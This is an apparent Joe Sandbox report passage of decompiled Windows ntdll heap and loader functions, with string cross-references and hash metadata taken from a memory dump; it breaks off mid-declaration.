
                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            • Entry Heap Size , xrefs: 1D87EDED
                                                                            • ---------------------------------------, xrefs: 1D87EDF9
                                                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D87EDE3
                                                                            • HEAP: , xrefs: 1D87ECDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                            • API String ID: 3446177414-1102453626
                                                                            • Opcode ID: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                            • Instruction ID: d5bd0e10b4b054f3e17e4f5ede1fe3ef913e4c945cf3a536ddee20aa518c82e6
                                                                            • Opcode Fuzzy Hash: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                            • Instruction Fuzzy Hash: F2418175A00227DFC716CF1DC484AA97BB5FF49354B26846AE4089B360D731FC81CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 30%
                                                                            			E1D7FDAC0(void* __ecx, intOrPtr _a4) {
                                                                            				char _v5;
                                                                            				intOrPtr* _t25;
                                                                            				char* _t26;
                                                                            				char _t28;
                                                                            				intOrPtr _t53;
                                                                            				intOrPtr* _t55;
                                                                            
                                                                            				_t53 = _a4;
                                                                            				_v5 = 0xff;
                                                                            				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
                                                                            					E1D899109(_t53,  &_v5);
                                                                            					L5:
                                                                            					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                            					if(_t25 != 0) {
                                                                            						if( *_t25 == 0) {
                                                                            							goto L6;
                                                                            						}
                                                                            						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            						L7:
                                                                            						if( *_t26 != 0) {
                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                            								E1D88F2AE(_t53);
                                                                            							}
                                                                            						}
                                                                            						_t28 = 1;
                                                                            						L9:
                                                                            						return _t28;
                                                                            					}
                                                                            					L6:
                                                                            					_t26 = 0x7ffe0380;
                                                                            					goto L7;
                                                                            				}
                                                                            				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
                                                                            					_t55 =  *0x1d8c3768; // 0x0
                                                                            					 *0x1d8c91e0(_t53);
                                                                            					_t28 =  *_t55();
                                                                            					goto L9;
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E1D7CB910();
                                                                            					} else {
                                                                            						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E1D7CB910("Invalid heap signature for heap at %p", _t53);
                                                                            					E1D7CB910(", passed to %s", "RtlLockHeap");
                                                                            					_push("\n");
                                                                            					E1D7CB910();
                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                            						 *0x1d8c47a1 = 1;
                                                                            						asm("int3");
                                                                            						 *0x1d8c47a1 = 0;
                                                                            					}
                                                                            					_t28 = 0;
                                                                            					goto L9;
                                                                            				} else {
                                                                            					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
                                                                            						E1D7DFED0( *((intOrPtr*)(_t53 + 0xc8)));
                                                                            						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            			}










                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                            • API String ID: 3446177414-1222099010
                                                                            • Opcode ID: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                            • Instruction ID: bbe61265f4a1a329dd7bbb1c3f8118b64c2a88854babd6061fb0bb3bd1388673
                                                                            • Opcode Fuzzy Hash: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                            • Instruction Fuzzy Hash: CB3124361087C4EFD722CF28C808BAA77A8EB05731F058585F46A477A2C779E940C693
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E1D7D9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				short _t95;
                                                                            				intOrPtr _t110;
                                                                            				short _t118;
                                                                            				signed int _t131;
                                                                            				intOrPtr _t136;
                                                                            				intOrPtr _t140;
                                                                            				intOrPtr _t146;
                                                                            				intOrPtr* _t148;
                                                                            				intOrPtr _t151;
                                                                            				intOrPtr _t152;
                                                                            				intOrPtr* _t154;
                                                                            				void* _t156;
                                                                            
                                                                            				_t141 = __edx;
                                                                            				_push(0x154);
                                                                            				_push(0x1d8abe98);
                                                                            				E1D827C40(__ebx, __edi, __esi);
                                                                            				 *(_t156 - 0xf0) = __edx;
                                                                            				_t151 = __ecx;
                                                                            				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                                                            				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                                                            				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                                                            				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                                                            				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                                                            				 *((short*)(_t156 - 0xda)) = 0;
                                                                            				 *(_t156 - 0xe0) = 0;
                                                                            				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                                                            				E1D818F40(_t156 - 0x13c, 0, 0x3c);
                                                                            				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                                                            				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                                                            				_t131 = 7;
                                                                            				memset(_t156 - 0x15c, 0, _t131 << 2);
                                                                            				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                                                            				_t152 = E1D7E9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                            				if(_t152 >= 0) {
                                                                            					if( *0x1d8c65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						_t152 = E1D7EA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                                                            						if(_t152 < 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                                                            							L11:
                                                                            							_t152 = 0xc0150005;
                                                                            							goto L1;
                                                                            						}
                                                                            						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                                                            							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                                                            								 *(_t156 - 0x120) = 0xfffffffc;
                                                                            							}
                                                                            						} else {
                                                                            							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                                                            						}
                                                                            						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                                                            						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                                                            						 *((short*)(_t156 - 0xda)) = _t95;
                                                                            						 *((short*)(_t156 - 0xdc)) = _t95;
                                                                            						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                            						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                                                            						 *((short*)(_t156 - 0xea)) = 0xaa;
                                                                            						_t152 = E1D7F5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                                                            						if(_t152 < 0 || E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                            							goto L1;
                                                                            						} else {
                                                                            							_t154 =  *0x1d8c65e0; // 0x76fba680
                                                                            							 *0x1d8c91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                                                            							_t152 =  *_t154();
                                                                            							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                            							if(_t152 < 0) {
                                                                            								goto L1;
                                                                            							} else {
                                                                            								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                                                            								if(_t110 == 0xffffffff) {
                                                                            									L26:
                                                                            									 *((intOrPtr*)(_t156 - 4)) = 1;
                                                                            									_t148 =  *0x1d8c65e8;
                                                                            									if(_t148 != 0) {
                                                                            										 *0x1d8c91e0(_t110);
                                                                            										 *_t148();
                                                                            									}
                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                            									goto L1;
                                                                            								}
                                                                            								E1D7EDC40(_t156 - 0x164, _t110);
                                                                            								 *((intOrPtr*)(_t156 - 4)) = 0;
                                                                            								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                                                            									E1D7E3B90(_t146);
                                                                            								}
                                                                            								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                                                            								_t152 = E1D7E9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                            								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                            								if(_t152 < 0) {
                                                                            									L25:
                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                            									_t110 = E1D83247B();
                                                                            									goto L26;
                                                                            								} else {
                                                                            									_t152 = E1D7EA170(7, 0, 2, _t149, _t156 - 0x140);
                                                                            									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                            									if(_t152 < 0) {
                                                                            										goto L25;
                                                                            									}
                                                                            									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                                                            										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                                                            										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                                                            										 *((short*)(_t156 - 0xda)) = _t118;
                                                                            										 *((short*)(_t156 - 0xdc)) = _t118;
                                                                            										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                            										if(E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                            											goto L25;
                                                                            										}
                                                                            										_t152 = 0xc0150004;
                                                                            										L24:
                                                                            										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                            										goto L25;
                                                                            									}
                                                                            									_t152 = 0xc0150005;
                                                                            									goto L24;
                                                                            								}
                                                                            							}
                                                                            							goto L11;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                                                            				return _t152;
                                                                            			}
















                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$@
                                                                            • API String ID: 3446177414-1194432280
                                                                            • Opcode ID: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                            • Instruction ID: 54a48adf9260cb7e732b257a0f05578fcf82192ce9e0c8142b873213fb207135
                                                                            • Opcode Fuzzy Hash: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                            • Instruction Fuzzy Hash: E6811C75D002699BDB21CF54CC85BEEB6B8AF09750F0141EAE91DB7250E7709E84CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 35%
                                                                            			E1D7F237A(intOrPtr* __ecx, void* __edx) {
                                                                            				char _v8;
                                                                            				signed int _v12;
                                                                            				intOrPtr* _v16;
                                                                            				void* __ebx;
                                                                            				intOrPtr _t22;
                                                                            				intOrPtr _t29;
                                                                            				signed int _t30;
                                                                            				signed char _t36;
                                                                            				intOrPtr _t38;
                                                                            				intOrPtr* _t42;
                                                                            				void* _t45;
                                                                            				void* _t48;
                                                                            				signed int _t50;
                                                                            				intOrPtr* _t51;
                                                                            				signed int _t53;
                                                                            				signed int _t55;
                                                                            				void* _t59;
                                                                            
                                                                            				_t38 =  *0x1d8c38b8; // 0x1
                                                                            				_t50 = 0;
                                                                            				_v16 = __ecx;
                                                                            				_v12 = 0;
                                                                            				_t55 = 0;
                                                                            				if(_t38 == 0) {
                                                                            					L2:
                                                                            					if(_t38 == 1) {
                                                                            						_t22 =  *0x1d8c68d8; // 0x0
                                                                            						if(_t22 != 0) {
                                                                            							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
                                                                            							 *0x1d8c68d8 = _t50;
                                                                            							 *0x1d8c5d4c = _t50;
                                                                            						}
                                                                            					}
                                                                            					 *0x1d8c38b8 = _t38;
                                                                            					return _t55;
                                                                            				}
                                                                            				_t59 =  *0x1d8c68d8 - _t55; // 0x0
                                                                            				if(_t59 != 0) {
                                                                            					 *0x1d8c38b8 = 0;
                                                                            					_t55 = E1D851BB6(_t38,  &_v8);
                                                                            					if(_t55 >= 0) {
                                                                            						_t51 =  *0x1d8c68d8; // 0x0
                                                                            						while( *_t51 != 0) {
                                                                            							 *0x1d8c91e0(_t51, 0, 1, 1, 0, 1, 0x10);
                                                                            							_v8();
                                                                            							if(0 == 0) {
                                                                            								_t55 = 0xc0000142;
                                                                            								L21:
                                                                            								_t50 = 0;
                                                                            								goto L2;
                                                                            							}
                                                                            							_t42 = _t51;
                                                                            							_t10 = _t42 + 2; // 0x2
                                                                            							_t48 = _t10;
                                                                            							do {
                                                                            								_t29 =  *_t42;
                                                                            								_t42 = _t42 + 2;
                                                                            							} while (_t29 != _v12);
                                                                            							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
                                                                            						}
                                                                            						_t30 =  *0x7ffe0330;
                                                                            						_t53 =  *0x1d8c9218; // 0x0
                                                                            						_v12 = _t30;
                                                                            						_t45 = 0x20;
                                                                            						_t46 = _t45 - (_t30 & 0x0000001f);
                                                                            						asm("ror edi, cl");
                                                                            						E1D7DFED0(0x1d8c32d8);
                                                                            						if( *0x1d8c65f4 < 3) {
                                                                            							_t46 = _v16;
                                                                            							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
                                                                            								E1D7C6704(_t46, _t53 ^ _v12);
                                                                            							}
                                                                            						}
                                                                            						_push(0x1d8c32d8);
                                                                            						E1D7DE740(_t46);
                                                                            						goto L21;
                                                                            					}
                                                                            					_t36 =  *0x1d8c37c0; // 0x0
                                                                            					if((_t36 & 0x00000003) != 0) {
                                                                            						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
                                                                            						_t36 =  *0x1d8c37c0; // 0x0
                                                                            					}
                                                                            					if((_t36 & 0x00000010) != 0) {
                                                                            						asm("int3");
                                                                            					}
                                                                            					_t55 = _t50;
                                                                            				}
                                                                            				goto L2;
                                                                            			}





















                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D83A79F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D83A7AF
                                                                            • apphelp.dll, xrefs: 1D7F2382
                                                                            • LdrpDynamicShimModule, xrefs: 1D83A7A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                            • Instruction ID: b03f96a8c1e0c7cfcb9224bb8c09051e3519726927bba110772112c69590e346
                                                                            • Opcode Fuzzy Hash: b20185a6612ed55b6b8a9f2929e16d56489734112b5f2be254059728f6625508
                                                                            • Instruction Fuzzy Hash: CF3139B5E00151FBD7209F59C8C5BEAB7B4FB84754F154069E918A7260D770E942CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                            			E1D7CF8B0(signed int __edx, signed int _a4) {
                                                                            				signed int _v8;
                                                                            				void* _v28;
                                                                            				void* _v54;
                                                                            				void* _v60;
                                                                            				void* _v64;
                                                                            				char _v88;
                                                                            				void* _v90;
                                                                            				signed int _v92;
                                                                            				char _v96;
                                                                            				void* _v100;
                                                                            				void* _v104;
                                                                            				void* _v108;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed int _t62;
                                                                            				intOrPtr _t64;
                                                                            				intOrPtr _t73;
                                                                            				signed int* _t86;
                                                                            				signed int _t87;
                                                                            				signed int _t91;
                                                                            				char* _t92;
                                                                            				char _t96;
                                                                            				void* _t102;
                                                                            				signed int* _t105;
                                                                            				intOrPtr _t106;
                                                                            				void* _t107;
                                                                            				signed int* _t110;
                                                                            				signed int _t111;
                                                                            				char* _t118;
                                                                            				signed int _t121;
                                                                            				signed int _t127;
                                                                            				void* _t128;
                                                                            				void* _t129;
                                                                            				signed int _t131;
                                                                            				signed int _t132;
                                                                            				void* _t139;
                                                                            				signed int _t161;
                                                                            				void* _t162;
                                                                            				void* _t164;
                                                                            				intOrPtr* _t166;
                                                                            				void* _t169;
                                                                            				signed int* _t170;
                                                                            				signed int* _t171;
                                                                            				signed int _t174;
                                                                            				signed int _t176;
                                                                            
                                                                            				_t158 = __edx;
                                                                            				_t176 = (_t174 & 0xfffffff8) - 0x64;
                                                                            				_v8 =  *0x1d8cb370 ^ _t176;
                                                                            				_push(_t128);
                                                                            				_t161 = _a4;
                                                                            				if(_t161 == 0) {
                                                                            					__eflags =  *0x1d8c6960 - 2;
                                                                            					if( *0x1d8c6960 >= 2) {
                                                                            						_t64 =  *[fs:0x30];
                                                                            						__eflags =  *(_t64 + 0xc);
                                                                            						if( *(_t64 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push("(HeapHandle != NULL)");
                                                                            						E1D7CB910();
                                                                            						__eflags =  *0x1d8c5da8;
                                                                            						if(__eflags == 0) {
                                                                            							_t139 = 2;
                                                                            							E1D88FC95(_t128, _t139, _t161, __eflags);
                                                                            						}
                                                                            					}
                                                                            					L26:
                                                                            					_t62 = 0;
                                                                            					L27:
                                                                            					_pop(_t162);
                                                                            					_pop(_t164);
                                                                            					_pop(_t129);
                                                                            					return E1D814B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
                                                                            					_t73 =  *[fs:0x30];
                                                                            					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
                                                                            					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
                                                                            						L30:
                                                                            						_t62 = _t161;
                                                                            						goto L27;
                                                                            					}
                                                                            					_t141 =  *(_t161 + 0x10);
                                                                            					__eflags =  *(_t161 + 0x10);
                                                                            					if( *(_t161 + 0x10) != 0) {
                                                                            						_t158 = _t161;
                                                                            						E1D8778DE(_t141, _t161, 0, 8, 0);
                                                                            					}
                                                                            					E1D7CFD8E(_t161, _t158);
                                                                            					E1D8902EC(_t161);
                                                                            					_t158 = 1;
                                                                            					E1D7C918A(_t161, 1, 0, 0);
                                                                            					E1D898E26(_t161);
                                                                            					goto L26;
                                                                            				}
                                                                            				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
                                                                            					_t166 =  *0x1d8c3758; // 0x0
                                                                            					 *0x1d8c91e0(_t161);
                                                                            					_t62 =  *_t166();
                                                                            					goto L27;
                                                                            				}
                                                                            				_t7 = _t161 + 0x58; // 0x8953046a
                                                                            				_t147 =  *_t7;
                                                                            				if( *_t7 != 0) {
                                                                            					_t158 = _t161;
                                                                            					E1D8778DE(_t147, _t161, 0, 8, 0);
                                                                            				}
                                                                            				E1D7CFD8E(_t161, _t158);
                                                                            				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
                                                                            					__eflags =  *(_t161 + 0x40) & 0x10000000;
                                                                            					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
                                                                            						goto L5;
                                                                            					}
                                                                            					_t127 = E1D87F85F(_t161);
                                                                            					__eflags = _t127;
                                                                            					if(_t127 == 0) {
                                                                            						goto L30;
                                                                            					}
                                                                            					goto L5;
                                                                            				} else {
                                                                            					L5:
                                                                            					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
                                                                            						goto L30;
                                                                            					} else {
                                                                            						E1D7DFED0(0x1d8c4800);
                                                                            						E1D7CFAEC(_t161);
                                                                            						_push(0x1d8c4800);
                                                                            						E1D7DE740(_t161);
                                                                            						_t86 = _t161 + 0x9c;
                                                                            						_t131 =  *_t86;
                                                                            						while(_t86 != _t131) {
                                                                            							_t87 = _t131;
                                                                            							_t158 =  &_v92;
                                                                            							_t131 =  *_t131;
                                                                            							_v92 = _t87 & 0xffff0000;
                                                                            							_v96 = 0;
                                                                            							E1D7CFABA( &_v92,  &_v96, 0x8000);
                                                                            							_t91 = E1D7E3C40();
                                                                            							__eflags = _t91;
                                                                            							if(_t91 == 0) {
                                                                            								_t92 = 0x7ffe0388;
                                                                            							} else {
                                                                            								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                            							}
                                                                            							__eflags =  *_t92;
                                                                            							if( *_t92 != 0) {
                                                                            								_t158 = _v92;
                                                                            								E1D88DA30(_t131, _t161, _v92, _v96);
                                                                            							}
                                                                            							_t86 = _t161 + 0x9c;
                                                                            						}
                                                                            						if( *((char*)(_t161 + 0xea)) == 2) {
                                                                            							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
                                                                            						} else {
                                                                            							_t96 = 0;
                                                                            						}
                                                                            						if(_t96 != 0) {
                                                                            							 *(_t176 + 0x1c) = _t96;
                                                                            							_t158 = _t176 + 0x1c;
                                                                            							_v88 = 0;
                                                                            							E1D7CFABA(_t176 + 0x1c,  &_v88, 0x8000);
                                                                            						}
                                                                            						_t132 = _t161 + 0x88;
                                                                            						if( *_t132 != 0) {
                                                                            							 *((intOrPtr*)(_t176 + 0x24)) = 0;
                                                                            							_t158 = _t132;
                                                                            							E1D7CFABA(_t132, _t176 + 0x24, 0x8000);
                                                                            							 *_t132 = 0;
                                                                            						}
                                                                            						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
                                                                            							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
                                                                            						}
                                                                            						goto L16;
                                                                            						L16:
                                                                            						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
                                                                            						E1D7CFA44(_t169);
                                                                            						if(_t169 != _t161) {
                                                                            							goto L16;
                                                                            						} else {
                                                                            							_t102 = E1D7E3C40();
                                                                            							_t170 = 0x7ffe0380;
                                                                            							if(_t102 != 0) {
                                                                            								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            							} else {
                                                                            								_t105 = 0x7ffe0380;
                                                                            							}
                                                                            							if( *_t105 != 0) {
                                                                            								_t106 =  *[fs:0x30];
                                                                            								__eflags =  *(_t106 + 0x240) & 0x00000001;
                                                                            								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
                                                                            									_t121 = E1D7E3C40();
                                                                            									__eflags = _t121;
                                                                            									if(_t121 != 0) {
                                                                            										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            										__eflags = _t170;
                                                                            									}
                                                                            									 *((short*)(_t176 + 0x2a)) = 0x1023;
                                                                            									_push(_t176 + 0x24);
                                                                            									_push(4);
                                                                            									_push(0x402);
                                                                            									_push( *_t170 & 0x000000ff);
                                                                            									 *(_t176 + 0x54) = _t161;
                                                                            									E1D812F90();
                                                                            								}
                                                                            							}
                                                                            							_t107 = E1D7E3C40();
                                                                            							_t171 = 0x7ffe038a;
                                                                            							if(_t107 != 0) {
                                                                            								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            							} else {
                                                                            								_t110 = 0x7ffe038a;
                                                                            							}
                                                                            							if( *_t110 != 0) {
                                                                            								_t111 = E1D7E3C40();
                                                                            								__eflags = _t111;
                                                                            								if(_t111 != 0) {
                                                                            									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            									__eflags = _t171;
                                                                            								}
                                                                            								 *((short*)(_t176 + 0x4e)) = 0x1023;
                                                                            								_push(_t176 + 0x48);
                                                                            								_push(4);
                                                                            								_push(0x402);
                                                                            								_push( *_t171 & 0x000000ff);
                                                                            								_v8 = _t161;
                                                                            								E1D812F90();
                                                                            							}
                                                                            							if(E1D7E3C40() != 0) {
                                                                            								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                            							} else {
                                                                            								_t118 = 0x7ffe0388;
                                                                            							}
                                                                            							if( *_t118 != 0) {
                                                                            								E1D88D9C6(_t161);
                                                                            							}
                                                                            							goto L26;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}


                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 3446177414-3610490719
                                                                            • Opcode ID: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                            • Instruction ID: e780e18fb9f0a4fc098640607b5e3dac60d1cc3809eb227cbe9f5b479f026f2e
                                                                            • Opcode Fuzzy Hash: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                            • Instruction Fuzzy Hash: 7B912672209752EFD716CB24C884B6EF7A5BF84B60F01445AFA458B291DB34F885C793
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
                                                                            			E1D7F0AEB(void* __ecx) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				signed int _v36;
                                                                            				signed int _v40;
                                                                            				intOrPtr _t67;
                                                                            				signed int _t70;
                                                                            				signed int _t76;
                                                                            				intOrPtr _t78;
                                                                            				intOrPtr _t79;
                                                                            				intOrPtr _t84;
                                                                            				intOrPtr _t89;
                                                                            				signed int _t90;
                                                                            				intOrPtr _t93;
